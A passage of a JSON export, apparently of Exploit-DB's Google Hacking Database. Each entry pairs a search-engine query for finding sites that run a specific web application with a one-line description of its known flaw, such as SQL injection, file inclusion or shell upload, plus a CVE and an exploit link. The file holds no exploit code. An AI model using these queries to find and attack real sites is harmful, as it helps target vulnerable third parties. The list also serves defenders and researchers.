Designs\"", "textualDescription": "Dayfox Blog 4 (postpost.php) Remote Code Execution Vulnerability - CVE: 2007-1525: http://www.exploit-db.com/exploits/3478" }, { "signatureReferenceNumber": "2876", "link": "https://www.exploit-db.com/ghdb/2876/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=Website+powered+by+Subdreamer+CMS+%26+Sequel+Theme+Designed+by+indiqo.media", "shortDescription": "Website powered by Subdreamer CMS & Sequel Theme Designed by indiqo.media", "textualDescription": "Subdreamer.v3.0.1 cms upload Vulnerability: http://www.exploit-db.com/exploits/11749" }, { "signatureReferenceNumber": "2877", "link": "https://www.exploit-db.com/ghdb/2877/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=%22These+forums+are+running+on%22+%22miniBB%22", "shortDescription": "\"These forums are running on\" \"miniBB\"", "textualDescription": "miniBB 2.1 (table) Remote SQL Injection Vulnerability - CVE: 2007-5719: http://www.exploit-db.com/exploits/4587" }, { "signatureReferenceNumber": "2878", "link": "https://www.exploit-db.com/ghdb/2878/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=%22PHPNews+Version+0.93%22", "shortDescription": "\"PHPNews Version 0.93\"", "textualDescription": "PHPNews 0.93 (format_menue) Remote File Inclusion Vulnerability - CVE: 2007-4232: http://www.exploit-db.com/exploits/4268" }, { "signatureReferenceNumber": "2879", "link": "https://www.exploit-db.com/ghdb/2879/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=%22%2Fnuke%2Fiframe.php%22", "shortDescription": "\"/nuke/iframe.php\"", "textualDescription": "iFrame for Phpnuke (iframe.php) Remote File Inclusion Vulnerability - CVE: 2007-1626: http://www.exploit-db.com/exploits/3512" }, { "signatureReferenceNumber": "2880", "link": "https://www.exploit-db.com/ghdb/2880/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=Sad+Raven%27s+Click+Counter+v1.0", "shortDescription": "Sad Raven's Click Counter v1.0", "textualDescription": "Sad Raven's Click Counter 1.0 passwd.dat Disclosure: http://www.exploit-db.com/exploits/7844" }, { "signatureReferenceNumber": "2882", "link": "https://www.exploit-db.com/ghdb/2882/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=Powered+by+dB+Masters%27+Curium+CMS+1", "shortDescription": "Powered by dB Masters' Curium CMS 1", "textualDescription": "dB Masters Curium CMS 1.03 (c_id) Remote SQL Injection Vulnerability - CVE: 2007-0765: http://www.exploit-db.com/exploits/3256" }, { "signatureReferenceNumber": "2883", "link": "https://www.exploit-db.com/ghdb/2883/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=Powered+by+XT-Commerce", "shortDescription": "Powered by XT-Commerce", "textualDescription": "XT-Commerce v1 Beta 1 by Pass / Creat and Download Backup Vulnerability: http://www.exploit-db.com/exploits/12447" }, { "signatureReferenceNumber": "2884", "link": "https://www.exploit-db.com/ghdb/2884/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=intext%3A%22Powered+by+Ramaas+Software%22", "shortDescription": "intext:\"Powered by Ramaas Software\"", "textualDescription": "Ramaas Software CMS SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12412" }, { "signatureReferenceNumber": "2885", "link": "https://www.exploit-db.com/ghdb/2885/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=Powered+by+Maian+Greetings+v2.1", "shortDescription": "Powered by Maian Greetings v2.1", "textualDescription": "Maian Greetings v2.1 Shell Upload Vulnerability: http://www.exploit-db.com/exploits/11301" }, { "signatureReferenceNumber": "2886", "link": "https://www.exploit-db.com/ghdb/2886/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=%22Yogurt+build%22", "shortDescription": "\"Yogurt build\"", "textualDescription": "Yogurt 0.3 (XSS/SQL Injection) Multiple Remote Vulnerabilities - CVE: 2009-2033: http://www.exploit-db.com/exploits/8932" }, { "signatureReferenceNumber": "2887", "link": "https://www.exploit-db.com/ghdb/2887/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=inurl%3Ae107_plugins", "shortDescription": "inurl:e107_plugins", "textualDescription": "e107 Code Exec - CVE: 2010-2099: http://www.exploit-db.com/exploits/12715" }, { "signatureReferenceNumber": "2888", "link": "https://www.exploit-db.com/ghdb/2888/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=%22Scientific+Image+DataBase%22", "shortDescription": "\"Scientific Image DataBase\"", "textualDescription": "Scientific Image DataBase 0.41 Blind SQL Injection - CVE: 2008-2834: http://www.exploit-db.com/exploits/5885" }, { "signatureReferenceNumber": "2889", "link": "https://www.exploit-db.com/ghdb/2889/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=Powered+by+phpMyRealty", "shortDescription": "Powered by phpMyRealty", "textualDescription": "phpMyRealty 1.0.x (search.php type) Remote SQL Injection Vulnerability - CVE: 2007-6472: http://www.exploit-db.com/exploits/4750" }, { "signatureReferenceNumber": "2891", "link": "https://www.exploit-db.com/ghdb/2891/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=%22Powered+by+myUPB%22", "shortDescription": "\"Powered by myUPB\"", "textualDescription": "myUPB v2.2.6 Multiple Vulnerabilities: http://www.exploit-db.com/exploits/13957" }, { "signatureReferenceNumber": "2893", "link": "https://www.exploit-db.com/ghdb/2893/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=inurl%3A%22com_simpledownload%22", "shortDescription": "inurl:\"com_simpledownload\"", "textualDescription": "Joomla Component simpledownload LFI Vulnerability - CVE: 2010-2122: http://www.exploit-db.com/exploits/12618" }, { "signatureReferenceNumber": "2895", "link": "https://www.exploit-db.com/ghdb/2895/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=Powered+by+Flinx", "shortDescription": "Powered by Flinx", "textualDescription": "flinx 1.3 (category.php id) Remote SQL Injection Vulnerabilit - CVE: 2008-0468: http://www.exploit-db.com/exploits/4985" }, { "signatureReferenceNumber": "2896", "link": "https://www.exploit-db.com/ghdb/2896/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=allinurl%3A%22com_restaurante%22", "shortDescription": "allinurl:\"com_restaurante\"", "textualDescription": "Joomla Component Restaurante 1.0 (id) SQL Injection Vulnerability - CVE: 2008-1465: http://www.exploit-db.com/exploits/5280" }, { "signatureReferenceNumber": "2897", "link": "https://www.exploit-db.com/ghdb/2897/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=Powered+by+MyHobbySite+1.01", "shortDescription": "Powered by MyHobbySite 1.01", "textualDescription": "MyHobbySite 1.01 SQL Injection and Authentication Bypass Vulnerability: http://www.exploit-db.com/exploits/14977" }, { "signatureReferenceNumber": "2898", "link": "https://www.exploit-db.com/ghdb/2898/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=inurl%3Aindex.php%3FmyPlantId%3D", "shortDescription": "inurl:index.php?myPlantId=", "textualDescription": "Member ID The Fish Index PHP SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12850" }, { "signatureReferenceNumber": "2901", "link": "https://www.exploit-db.com/ghdb/2901/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=%22powered+by+real-estate-website%22", "shortDescription": "\"powered by real-estate-website\"", "textualDescription": "Real Estate Web Site 1.0 (SQL/XSS) Multiple Remote Vulnerabilities: http://www.exploit-db.com/exploits/5763" }, { "signatureReferenceNumber": "2902", "link": "https://www.exploit-db.com/ghdb/2902/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=%22Powered+by+%5B+iSupport+1.8+%5D%22", "shortDescription": "\"Powered by [ iSupport 1.8 ]\"", "textualDescription": "iSupport 1.8 XSS/LFI - CVE: 2009-4434: http://www.exploit-db.com/exploits/10478" }, { "signatureReferenceNumber": "2903", "link": "https://www.exploit-db.com/ghdb/2903/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=%22This+site+is+powered+by+CMS+Made+Simple+version+1.2.2%22", "shortDescription": "\"This site is powered by CMS Made Simple version 1.2.2\"", "textualDescription": "CMS Made Simple 1.2.2 (TinyMCE module) SQL Injection Vuln - CVE: 2007-6656: http://www.exploit-db.com/exploits/4810" }, { "signatureReferenceNumber": "2905", "link": "https://www.exploit-db.com/ghdb/2905/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=infusions%2Fmanuals%2Fmanuals.php%3Fmanual%3D", "shortDescription": "infusions/manuals/manuals.php?manual=", "textualDescription": "PHP-Fusion Mod manuals (manual) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6681" }, { "signatureReferenceNumber": "2906", "link": "https://www.exploit-db.com/ghdb/2906/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=allinurl%3A%2Fmodernbill%2F", "shortDescription": "allinurl:/modernbill/", "textualDescription": "Modernbill 1.6 (config.php) Remote File Include Vulnerability - CVE: 2006-4034: http://www.exploit-db.com/exploits/2127" }, { "signatureReferenceNumber": "2907", "link": "https://www.exploit-db.com/ghdb/2907/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=Powered+by+EasySiteNetwork", "shortDescription": "Powered by EasySiteNetwork", "textualDescription": "Wallpaper Site 1.0.09 (category.php) Remote SQL Injection Vulnerability - CVE: 2007-6580: http://www.exploit-db.com/exploits/4770" }, { "signatureReferenceNumber": "2908", "link": "https://www.exploit-db.com/ghdb/2908/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=inurl%3A%22main_forum.php%3Fcat%3D%22", "shortDescription": "inurl:\"main_forum.php?cat=\"", "textualDescription": "GeN3 forum V1.3 SQL Injection Vulnerability - CVE: 2009-4263: http://www.exploit-db.com/exploits/10299" }, { "signatureReferenceNumber": "2910", "link": "https://www.exploit-db.com/ghdb/2910/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=%22eCommerce+Engine+%C2%A9+2006+xt%3ACommerce+Shopsoftware%22", "shortDescription": "\"eCommerce Engine \u00a9 2006 xt:Commerce Shopsoftware\"", "textualDescription": "xt:Commerce Shopsoftware (fckeditor) Arbitrary File Upload Vulnerability: http://www.exploit-db.com/exploits/15455" }, { "signatureReferenceNumber": "2911", "link": "https://www.exploit-db.com/ghdb/2911/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=intitle%3A%22Powered+by+Open+Bulletin+Board%22", "shortDescription": "intitle:\"Powered by Open Bulletin Board\"", "textualDescription": "Open Bulletin Board Multiple Blind Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11336" }, { "signatureReferenceNumber": "2912", "link": "https://www.exploit-db.com/ghdb/2912/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=%22My+Photo+v1.46.4+%C3%82%C2%A9+Big+Resources%22", "shortDescription": "\"My Photo v1.46.4 \u00c2\u00a9 Big Resources\"", "textualDescription": "Built2Go PHP Rate My Photo 1.46.4 Remote File Upload Vulnerability: http://www.exploit-db.com/exploits/7645" }, { "signatureReferenceNumber": "2913", "link": "https://www.exploit-db.com/ghdb/2913/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=Powered+by+Fantastic+News+v2.1.4", "shortDescription": "Powered by Fantastic News v2.1.4", "textualDescription": "Fantastic News 2.1.4 Multiple Remote File Include Vulnerabilities: http://www.exploit-db.com/exploits/3027" }, { "signatureReferenceNumber": "2914", "link": "https://www.exploit-db.com/ghdb/2914/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=Platform+Dokeos+1.8.4+%C3%82%C2%A9+2007", "shortDescription": "Platform Dokeos 1.8.4 \u00c2\u00a9 2007", "textualDescription": "Dokeos 1.8.4 Bypass Upload Shell From Your Profile Vulnerability - CVE: 2007-6479: http://www.exploit-db.com/exploits/4753" }, { "signatureReferenceNumber": "2915", "link": "https://www.exploit-db.com/ghdb/2915/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=%22Powered+by+iScripts+SocialWare%22", "shortDescription": "\"Powered by iScripts SocialWare\"", "textualDescription": "iScripts SocialWare (id) Remote SQL Injection Vulnerbility - CVE: 2008-1772: http://www.exploit-db.com/exploits/5402" }, { "signatureReferenceNumber": "2916", "link": "https://www.exploit-db.com/ghdb/2916/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=Powered+By+eLitius+1.0", "shortDescription": "Powered By eLitius 1.0", "textualDescription": "eLitius 1.0 Arbitrary Database Backup: http://www.exploit-db.com/exploits/8498" }, { "signatureReferenceNumber": "2917", "link": "https://www.exploit-db.com/ghdb/2917/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=inurl%3A%22com_artlinks%22", "shortDescription": "inurl:\"com_artlinks\"", "textualDescription": "Joomla Artlinks Component 1.0b4 Remote Include Vulnerability - CVE: 2006-3949: http://www.exploit-db.com/exploits/2209" }, { "signatureReferenceNumber": "2918", "link": "https://www.exploit-db.com/ghdb/2918/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=inurl%3Acom_djclassifieds", "shortDescription": "inurl:com_djclassifieds", "textualDescription": "Joomla DJ-Classifieds Extension com_djclassifieds Upload Vulnerability: http://www.exploit-db.com/exploits/12479" }, { "signatureReferenceNumber": "2919", "link": "https://www.exploit-db.com/ghdb/2919/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=intext%3A%22Remository+3.25.+is+technology+by+Black+Sheep+Research%22", "shortDescription": "intext:\"Remository 3.25. is technology by Black Sheep Research\"", "textualDescription": "Mambo Remository Component 3.25 Remote Include Vulnerability - CVE: 2006-4130: http://www.exploit-db.com/exploits/2172" }, { "signatureReferenceNumber": "2920", "link": "https://www.exploit-db.com/ghdb/2920/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=inurl%3Aratelink.php%3Flnkid%3D", "shortDescription": "inurl:ratelink.php?lnkid=", "textualDescription": "Link Trader (ratelink.php lnkid) Remote SQL Injection Vulnerability - CVE: 2008-6102: http://www.exploit-db.com/exploits/6650" }, { "signatureReferenceNumber": "2921", "link": "https://www.exploit-db.com/ghdb/2921/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=Powered+by%3A+deonixscripts.com", "shortDescription": "Powered by: deonixscripts.com", "textualDescription": "Web Template Management System 1.3 Remote SQL Injection - CVE: 2007-5233: http://www.exploit-db.com/exploits/4482" }, { "signatureReferenceNumber": "2922", "link": "https://www.exploit-db.com/ghdb/2922/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=inurl%3Acom_ybggal", "shortDescription": "inurl:com_ybggal", "textualDescription": "Joomla Component com_ybggal 1.0 (catid) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/13979" }, { "signatureReferenceNumber": "2923", "link": "https://www.exploit-db.com/ghdb/2923/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=Powered+By+Power+Editor", "shortDescription": "Powered By Power Editor", "textualDescription": "Power Editor 2.0 Remote File Disclosure / Edit Vulnerability - CVE: 2008-2116: http://www.exploit-db.com/exploits/5549" }, { "signatureReferenceNumber": "2924", "link": "https://www.exploit-db.com/ghdb/2924/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=%22Powered+by%3A+eSmile%22", "shortDescription": "\"Powered by: eSmile\"", "textualDescription": "eSmile Script (index.php) SQL Injection Vulnerability - CVE: 2010-0764: http://www.exploit-db.com/exploits/11382" }, { "signatureReferenceNumber": "2925", "link": "https://www.exploit-db.com/ghdb/2925/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=%22advanced_search_results.php%3Fgender%3D%22", "shortDescription": "\"advanced_search_results.php?gender=\"", "textualDescription": "Vastal I-Tech Dating Zone (fage) SQL Injection Vulnerability - CVE: 2008-4461: http://www.exploit-db.com/exploits/6388" }, { "signatureReferenceNumber": "2926", "link": "https://www.exploit-db.com/ghdb/2926/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=allinurl%3A%22com_ahsshop%22do%3Ddefault", "shortDescription": "allinurl:\"com_ahsshop\"do=default", "textualDescription": "Mambo Component ahsShop 1.51 (vara) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5335" }, { "signatureReferenceNumber": "2927", "link": "https://www.exploit-db.com/ghdb/2927/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=inurl%3Acom_ice+%22catid%22", "shortDescription": "inurl:com_ice \"catid\"", "textualDescription": "Joomla Component Ice Gallery 0.5b2 (catid) Blind SQL Injection Vuln - CVE: 2008-6852: http://www.exploit-db.com/exploits/7572" }, { "signatureReferenceNumber": "2928", "link": "https://www.exploit-db.com/ghdb/2928/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=Powered+by+ExoPHPDesk+v1.2+Final.", "shortDescription": "Powered by ExoPHPDesk v1.2 Final.", "textualDescription": "ExoPHPDesk 1.2.1 (faq.php) Remote SQL Injection Vulnerability - CVE: 2007-0676: http://www.exploit-db.com/exploits/3234" }, { "signatureReferenceNumber": "2931", "link": "https://www.exploit-db.com/ghdb/2931/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=allinurl%3Aspaw2%2Fdialogs%2F", "shortDescription": "allinurl:spaw2/dialogs/", "textualDescription": "Spaw Editor v1.0 & 2.0 Remote File Upload: http://www.exploit-db.com/exploits/12672" }, { "signatureReferenceNumber": "2932", "link": "https://www.exploit-db.com/ghdb/2932/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=Powered+by+eLitius+Version+1.0", "shortDescription": "Powered by eLitius Version 1.0", "textualDescription": "eLitius 1.0 (banner-details.php id) SQL Injection Vulnerability - CVE: 2009-1506: http://www.exploit-db.com/exploits/8563" }, { "signatureReferenceNumber": "2935", "link": "https://www.exploit-db.com/ghdb/2935/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=site%3Ascartserver.com", "shortDescription": "site:scartserver.com", "textualDescription": "SCart 2.0 (page) Remote Code Execution - CVE: 2006-7012: http://www.exploit-db.com/exploits/1876" }, { "signatureReferenceNumber": "2936", "link": "https://www.exploit-db.com/ghdb/2936/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=%22realizacja+eCreo.eu%22", "shortDescription": "\"realizacja eCreo.eu\"", "textualDescription": "eCreo SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12713" }, { "signatureReferenceNumber": "2939", "link": "https://www.exploit-db.com/ghdb/2939/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=inurl%3Aindex.php%3Ftitle%3Dgamepage", "shortDescription": "inurl:index.php?title=gamepage", "textualDescription": "PHP Gamepage SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12634" }, { "signatureReferenceNumber": "2940", "link": "https://www.exploit-db.com/ghdb/2940/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=inurl%3Aindex.php%3Foption%3Dcom_akobook", "shortDescription": "inurl:index.php?option=com_akobook", "textualDescription": "Joomla Component Akobook 2.3 (gbid) SQL Injection Vulnerability - CVE: 2009-2638: http://www.exploit-db.com/exploits/8911" }, { "signatureReferenceNumber": "2942", "link": "https://www.exploit-db.com/ghdb/2942/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=inurl%3A%22%2FCMS%2Fpage.php%3Fp%3D%22", "shortDescription": "inurl:\"/CMS/page.php?p=\"", "textualDescription": "Schweizer NISADA Communication CMS SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10543" }, { "signatureReferenceNumber": "2943", "link": "https://www.exploit-db.com/ghdb/2943/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=Powered+by+CMScout+%28c%292005+CMScout+Group", "shortDescription": "Powered by CMScout (c)2005 CMScout Group", "textualDescription": "CMScout 2.06 SQL Injection/Local File Inclusion Vulnerabilities - CVE: 2008-6725: http://www.exploit-db.com/exploits/7625" }, { "signatureReferenceNumber": "2945", "link": "https://www.exploit-db.com/ghdb/2945/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=Powered+by%3A+Maian+Uploader+v4.0", "shortDescription": "Powered by: Maian Uploader v4.0", "textualDescription": "Maian Uploader v4.0 Shell Upload Vulnerability: http://www.exploit-db.com/exploits/11571" }, { "signatureReferenceNumber": "2948", "link": "https://www.exploit-db.com/ghdb/2948/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=intext%3A%22%C2%A9+Tainos+Webdesign%22", "shortDescription": "intext:\"\u00a9 Tainos Webdesign\"", "textualDescription": "Tainos Webdesign (All Scripts) SQL/XSS/HTML Injection Vulnerability: http://www.exploit-db.com/exploits/12631" }, { "signatureReferenceNumber": "2949", "link": "https://www.exploit-db.com/ghdb/2949/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=inurl%3A%22com_virtuemart%22", "shortDescription": "inurl:\"com_virtuemart\"", "textualDescription": "Joomla Component com_virtuemart SQL injection vulnerability (product_id): http://www.exploit-db.com/exploits/10407" }, { "signatureReferenceNumber": "2950", "link": "https://www.exploit-db.com/ghdb/2950/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=%22Powered+by+RW%3A%3ADownload+v2.0.3+lite%22", "shortDescription": "\"Powered by RW::Download v2.0.3 lite\"", "textualDescription": "RW::Download 2.0.3 lite (index.php dlid) Remote SQL Injection Vuln - CVE: 2007-4845: http://www.exploit-db.com/exploits/4371" }, { "signatureReferenceNumber": "2951", "link": "https://www.exploit-db.com/ghdb/2951/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=index.php%3Foption%3Dcom_swmenupro", "shortDescription": "index.php?option=com_swmenupro", "textualDescription": "Joomla/Mambo Component SWmenuFree 4.0 RFI Vulnerability - CVE: 2007-1699: http://www.exploit-db.com/exploits/3557" }, { "signatureReferenceNumber": "2952", "link": "https://www.exploit-db.com/ghdb/2952/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+By+OpenCart%22", "shortDescription": "\"Powered By OpenCart\"", "textualDescription": "Opencart 1.4.9.1 Remote File Upload Vulnerability: http://www.exploit-db.com/exploits/15050" }, { "signatureReferenceNumber": "2953", "link": "https://www.exploit-db.com/ghdb/2953/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+eclime.com", "shortDescription": "Powered by eclime.com", "textualDescription": "eclime v1.1 ByPass / Create and Download Backup Vulnerability: http://www.exploit-db.com/exploits/12279" }, { "signatureReferenceNumber": "2955", "link": "https://www.exploit-db.com/ghdb/2955/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22article.download.php%22", "shortDescription": "inurl:\"article.download.php\"", "textualDescription": "Star Articles 6.0 Remote Blind SQL Injection Vulnerability - CVE: 2008-7075: http://www.exploit-db.com/exploits/7240" }, { "signatureReferenceNumber": "2956", "link": "https://www.exploit-db.com/ghdb/2956/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_mojo%22", "shortDescription": "inurl:\"com_mojo\"", "textualDescription": "Joomla MojoBlog Component v0.15 Multiple Remote File Include Vulnerabilities - CVE: 2009-4789: http://www.exploit-db.com/exploits/10273" }, { "signatureReferenceNumber": "2957", "link": "https://www.exploit-db.com/ghdb/2957/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22article.download.php%22", "shortDescription": "inurl:\"article.download.php\"", "textualDescription": "Star Articles 6.0 Remote Blind SQL Injection - CVE: 2008-7075: http://www.exploit-db.com/exploits/7243" }, { "signatureReferenceNumber": "2958", "link": "https://www.exploit-db.com/ghdb/2958/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+LightBlog%22+-+Powered+by+LightBlog", "shortDescription": "\"Powered by LightBlog\" - Powered by LightBlog", "textualDescription": "LightBlog 9.5 cp_upload_image.php Remote File Upload Vulnerability - CVE: 2008-0632: http://www.exploit-db.com/exploits/5033" }, { "signatureReferenceNumber": "2959", "link": "https://www.exploit-db.com/ghdb/2959/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+photokorn%22", "shortDescription": "\"Powered by photokorn\"", "textualDescription": "photokron 1.7 (update script) Remote Database Disclosure - CVE: 2008-0297: http://www.exploit-db.com/exploits/4897/" }, { "signatureReferenceNumber": "2960", "link": "https://www.exploit-db.com/ghdb/2960/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Site+designed+and+built+by+Powder+Blue.%22+inurl:index.php%3Fid_page%3D", "shortDescription": "\"Site designed and built by Powder Blue.\" inurl:index.php?id_page=", "textualDescription": "Powder Blue Design SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12671" }, { "signatureReferenceNumber": "2961", "link": "https://www.exploit-db.com/ghdb/2961/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by++MetInfo+3.0%22", "shortDescription": "\"Powered by MetInfo 3.0\"", "textualDescription": "MetInfo 3.0 PHP Code Injection Vulnerability: http://www.exploit-db.com/exploits/15361" }, { "signatureReferenceNumber": "2962", "link": "https://www.exploit-db.com/ghdb/2962/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by++MetInfo++2.0%22", "shortDescription": "\"Powered by MetInfo 2.0\"", "textualDescription": "MetInfo 2.0 PHP Code Injection Vulnerability: http://www.exploit-db.com/exploits/15360" }, { "signatureReferenceNumber": "2963", "link": "https://www.exploit-db.com/ghdb/2963/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intext:%22Marketing+Web+Design+-+Posicionamiento+en+Buscadores%22", "shortDescription": "intext:\"Marketing Web Design - Posicionamiento en Buscadores\"", "textualDescription": "Marketing Web Design Multiple Vulnerabilities: http://www.exploit-db.com/exploits/12788" }, { "signatureReferenceNumber": "2964", "link": "https://www.exploit-db.com/ghdb/2964/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=pages.php%3Fid%3D+%22Multi+Vendor+Mall%22", "shortDescription": "pages.php?id= \"Multi Vendor Mall\"", "textualDescription": "Multi Vendor Mall (pages.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12748" }, { "signatureReferenceNumber": "2966", "link": "https://www.exploit-db.com/ghdb/2966/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allintext:%22Home+Member+Search+Chat+Room+Forum+Help/Support+privacy+policy%22", "shortDescription": "allintext:\"Home Member Search Chat Room Forum Help/Support privacy policy\"", "textualDescription": "eMeeting Online Dating Software 5.2 SQL Injection Vulnerabilities: CVE: 2007-3609: http://www.exploit-db.com/exploits/4154" }, { "signatureReferenceNumber": "2968", "link": "https://www.exploit-db.com/ghdb/2968/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+Zylone+IT", "shortDescription": "Powered by Zylone IT", "textualDescription": "Zylone IT Multiple Blind SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14270" }, { "signatureReferenceNumber": "2970", "link": "https://www.exploit-db.com/ghdb/2970/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+MetInfo+3.0", "shortDescription": "Powered by MetInfo 3.0", "textualDescription": "Metinfo v3.0 Multiple Vulnerabilities: http://www.exploit-db.com/exploits/15496" }, { "signatureReferenceNumber": "2971", "link": "https://www.exploit-db.com/ghdb/2971/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+Info+Fisier.", "shortDescription": "Powered by Info Fisier.", "textualDescription": "Info Fisier 1.0 Remote File Upload Vulnerability: 